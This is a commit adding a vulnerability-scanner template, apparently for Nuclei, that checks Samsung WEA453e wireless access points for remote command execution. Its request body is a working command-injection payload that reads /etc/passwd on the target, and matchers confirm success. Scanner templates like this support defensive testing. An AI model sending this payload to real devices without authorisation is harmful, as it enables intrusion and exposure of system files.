Create samsung-wlan-ap-rce.yaml

patch-1
PikPikcU 2021-02-15 06:17:07 +00:00 committed by GitHub
parent 50c0d50d3d
commit 3f3f9b9f43
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions

View File

@ -0,0 +1,24 @@
id: samsung-wlan-ap-rce
info:
name: Samsung Wlan AP (WEA453e) RCE
author: pikpikcu
severity: critical
reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
requests:
- method: POST
path:
- "{{BaseURL}}/(download)/tmp/poc.txt"
body: "command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
- "bin:[x]:1:1"
part: body
- type: status
status:
- 200